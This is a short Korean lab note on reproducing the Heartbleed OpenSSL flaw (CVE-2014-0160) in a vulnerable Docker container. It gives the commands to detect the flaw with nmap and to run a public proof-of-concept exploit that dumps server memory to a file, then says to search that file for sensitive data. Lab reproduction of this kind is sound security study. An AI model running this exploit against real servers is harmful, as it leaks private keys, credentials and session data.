[CVE-2014-0160] HeartBleed OpenSSL 1.0.1e 설치

참고 : https://hub.docker.com/r/hmlio/vaas-cve-2014-0160

PoC : https://github.com/sensepost/heartbleed-poc

 

$ docker pull hmlio/vaas-cve-2014-0160 : 이미지 다운로드

$ docker images : 이미지 확인

$ docker run -it -d -P --expose="443" --name heartbleed hmlio/vaas-cve-2014-0160 /bin/bash : 컨테이너 생성

$ docker start heartbleed : 컨테이너 시작

 

$ docker exec -u 0 -it heartbleed /bin/bash : 컨테이너 들어가기

# service apache2 start : 아파치 실행

# exit : 컨테이너 나오기

 

$ ifconfig | grep inet : IP 확인

$ docker ps : 컨테이너 포트 확인

http://IP:포트 : 서비스 정상 접속 확인

 

nmap -sV -p 32781 --script=ssl-heartbleed 192.168.19.138 : nmap 스크립트로 취약여부 확인

 

python heartbleed-poc.py -p 32781 -n 500 -f result.bin 192.168.19.138 : PoC 로 result.bin 파일 생성

 

strings result.bin >> result.txt : result.bin 파일 result.txt 로 만든다

 

파일 내 중요정보 확인한다